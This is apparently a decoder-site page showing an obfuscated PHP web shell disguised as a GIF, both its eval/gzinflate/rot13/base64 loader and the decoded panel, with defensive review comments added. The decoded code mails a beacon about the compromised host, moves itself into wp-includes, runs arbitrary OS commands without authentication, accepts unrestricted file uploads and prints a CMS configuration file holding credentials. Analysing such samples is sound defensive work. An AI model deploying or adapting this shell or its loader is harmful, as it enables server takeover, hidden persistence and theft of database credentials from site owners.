
PHP Decode

GIF89a<?php $d='xRd4Qhu59jNV/IeDm9UkTZIJsFtIIW7bhWNOaiG9Vrj3A61TkxknZJkZj3lCUIr63/cceyaP0..

Decoded Output download

// NOTE(review): static HTML/CSS frame for the operator panel. The heredoc holds no PHP variables,
// so every byte below is emitted as-is and can be matched as a literal content signature
// (the spaced-out banner inside the blink element is the most distinctive string).
// The favicon is hot-linked from a third-party host: a browser that renders this page makes an
// outbound request to that host, so inspect samples like this as text or in an isolated viewer.
echo <<<html
<link rel="SHORTCUT ICON" href="http://www.zeroto60times.com/blog/wp-content/uploads/2013/02/ferrari-cars-logo-emblem.jpg">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>T E A M 2 4 H O U R S U N K N O W N </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td>
html;
?>
<?php
// NOTE(review): this run does three things, none of them behind any authentication check:
// (1) mails a notification about the compromised host, (2) optionally relocates the script,
// (3) prints a host fingerprint banner into every response.

// Disables PHP error reporting for the rest of the request.
error_reporting(0);
// (1) Beacon. When $_SESSION['bajak'] is not set, the script collects the Host header, request URI,
// safe_mode state, server address and client address and sends them with mail() to a hard-coded
// recipient (the address is shown redacted on this page).
// No session_start() is visible in this listing; if none runs earlier, the flag presumably never
// persists and the mail is sent on every request. Verify against the host's mail logs.
if (!isset($_SESSION['bajak']))	{
// $visitcount is assigned here and not read anywhere in the visible listing.
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
// The literal below becomes the mail subject; together with "Hasil Bajakan" in the body it is a
// usable search string for outbound-mail logs and queue inspection.
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
// Subject and body embed request-derived values ($web, $inj) without any filtering.
mail('[email protected]', "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
// (2) Relocation. Any request carrying a `clone` query parameter makes the script rename() itself
// to <DOCUMENT_ROOT>/wp-includes/wp-simple.php. For hunting: check for that path and compare the
// wp-includes directory against a known-good list of WordPress core files.
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";
rename($source, $desti);
}
// (3) Fingerprint banner: safe_mode state, uid/gid, user name, uname string and working directory
// are written into the page. get_current_user(), getmyuid() and getmygid() report the owner of the
// script file, which is not necessarily the account the web server process runs as.
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>T E A M C O D E R</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br><b> Dir : ".getcwd()."</b><br>";
// Returns the current working directory with a trailing path separator appended when it is missing.
// The first branch handles '/'-separated paths, the second one backslash-separated paths.
// Falls through without a return value when neither separator is found (or is found only at offset 0,
// because the strrpos() result is used directly as a truth value).
// NOTE(review): the backslash literals in the second branch are printed with a single backslash before
// the closing quote, which does not parse as PHP. The decoder page presumably dropped one backslash
// when rendering; treat this listing as a rendering of the payload, not as runnable source.
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
// Runs $cmd as an operating-system command and returns whatever it printed.
// Tries, in order: system(), exec(), passthru(), shell_exec(), then popen(); the first four are
// gated on function_exists(), popen() is simply attempted. Every call is prefixed with @, so a
// failing primitive raises no visible warning. Returns nothing if no branch is taken.
// NOTE(review): the callers in this listing pass request parameters straight into $cmd. These five
// function names are the ones to cover in a disable_functions policy and in static scans of
// web-root PHP files; process-level telemetry (web server user spawning a shell) is the runtime signal.
function exe($cmd) {
	// system() prints directly, so output buffering is used to capture it instead.
	if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	// exec() fills $results line by line; the lines are joined with no separator between them.
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	// passthru() also prints directly; same buffering capture as the system() branch.
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	// Last resort: read the command's stdout through a pipe in 1024-byte chunks.
	} elseif (is_resource($f = @popen($cmd,"r"))) {
		$buff = "";
		while(!@feof($f))
			$buff .= fread($f,1024);
		pclose($f);
		return $buff;
	}
}
// NOTE(review): request dispatcher of the panel. It renders two forms (command, file upload) and
// then acts on the request parameters; there is no login, token or origin check anywhere in it.
echo '<form method="POST" action=""><br><br><font size=2 color=#888888><b>Command : </b><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<br><br><form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File : </b></font><input type=hidden name="submit"><input type=file name="userfile" size=28><br><br><font size=2 color=#888888><b>New name : </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
// Upload handler: the destination is the working directory (from pwd()) plus either the posted
// `newname` or the client-supplied file name, with no check on extension, type or path components.
// move_uploaded_file() is called twice on the same temp file, so the printed status text does not
// track the real outcome. During triage, confirm dropped files on disk (new or recently modified
// files in the script's directory) rather than trusting the message seen in a captured response.
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
// Command dispatch, first match wins: POST `command` (runs POST `cmd`), GET `cmd`, GET `rf`,
// otherwise a directory listing. The GET variants land in the query string and are therefore
// visible in ordinary access logs; the POST variant typically needs body logging or a WAF to see.
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".exe($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".exe($comd)."</font></pre>";
}
// `rf` prints ../../configuration.php relative to the working directory, presumably a CMS
// configuration file holding database credentials (confirm against the affected site layout).
// If this parameter shows up in logs, treat the secrets in that file as exposed and rotate them.
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".exe('ls -la')."</font></pre>";
}?>
<?
// NOTE(review): short open tag. This part is only parsed as PHP when short_open_tag is enabled;
// otherwise the lines below reach the client as literal text. The heredoc just closes the HTML
// table and body opened at the top of the listing and contains no PHP variables.
echo <<<footer
</td>
    </tr>
  </table>
</div>
</body>
footer;


Original Code

GIF89a<?php
$d='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';
// NOTE(review): loader stage. $d is base64-decoded, passed through ROT13, inflated (raw DEFLATE)
// and the result is handed to eval(), so the panel code never sits on disk in clear text.
// The nested eval/gzinflate/str_rot13/base64_decode call chain is a high-signal static pattern for
// scanning web roots and upload directories. To inspect a sample like this, print the decoded
// string in an isolated environment instead of letting eval() run it.
// The file also starts with the GIF magic string before the PHP open tag, so checks that only sniff
// the first bytes may classify it as an image; upload handling should allow-list extensions,
// re-encode images and keep uploaded files out of any directory where PHP is executed.
eval(gzinflate(str_rot13(base64_decode($d))));
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

$d xRd4Qhu59jNV/IeDm9UkTZIJsFtIIW7bhWNOaiG9Vrj3A61TkxknZJkZj3lC..

Stats

MD5 4d53ab09d14e4ed28b5344fb26e1daae
Eval Count 1
Decode Time 76 ms